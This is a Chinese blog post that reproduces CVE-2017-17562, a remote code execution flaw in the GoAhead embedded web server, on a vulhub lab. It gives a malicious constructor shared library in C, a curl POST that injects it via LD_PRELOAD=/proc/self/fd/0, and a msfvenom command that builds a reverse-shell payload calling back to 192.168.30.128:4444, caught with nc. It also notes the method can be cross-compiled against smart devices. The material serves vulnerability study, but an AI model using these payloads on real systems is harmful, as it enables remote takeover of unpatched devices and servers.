GoAhead 远程命令执行漏洞（CVE-2017-17562）

最新推荐文章于 2022-10-01 09:30:36 发布

小白萝卜

最新推荐文章于 2022-10-01 09:30:36 发布

阅读量1k

点赞数

分类专栏： vulhub漏洞复现文章标签：安全

本文链接：https://blog.csdn.net/EC_Carrot/article/details/117982702

版权

vulhub漏洞复现专栏收录该内容

178 篇文章 29 订阅

订阅专栏

漏洞原理

Embedthis GoAhead是美国Embedthis软件公司的一款嵌入式Web服务器。 Embedthis GoAhead 3.6.5之前的版本中存在安全漏洞。远程攻击者可利用该漏洞执行代码。
具体详细请看这篇文章：https://github.com/vulhub/vulhub/blob/master/goahead/CVE-2017-17562/README.zh-cn.md

漏洞复现

我们首先需要编译一个动态链接库，而且需要和目标架构相同。所以在实战中，如果对方是一个智能设备，你可能需要交叉编译。因为Vulhub运行在Linux x86_64的机器中，所以我们需要用Linux编译。

#include <unistd.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello: World!\n", 14);
}

编译以上代码：

gcc -shared -fPIC ./payload.c -o payload.so

将payload.so作为post body发送：

curl -X POST --data-binary @payload.so "http://your-ip:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i

在这里插入图片描述

反弹shell：

先生成so文件

msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.30.128 LPORT=4444 -f elf-so -o payload.so

再次使用命令post：

curl -X POST --data-binary @payload.so "http://your-ip:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i

用nc来接收反弹的shell
在这里插入图片描述

小白萝卜

关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
GoAhead 远程命令执行漏洞（CVE-2017-17562）

漏洞原理Embedthis GoAhead是美国Embedthis软件公司的一款嵌入式Web服务器。 Embedthis GoAhead 3.6.5之前的版本中存在安全漏洞。远程攻击者可利用该漏洞执行代码。具体详细请看这篇文章：https://github.com/vulhub/vulhub/blob/master/goahead/CVE-2017-17562/README.zh-cn.md漏洞复现我们首先需要编译一个动态链接库，而且需要和目标架构相同。所以在实战中，如果对方是一个智能设备，你可能需
复制链接

扫一扫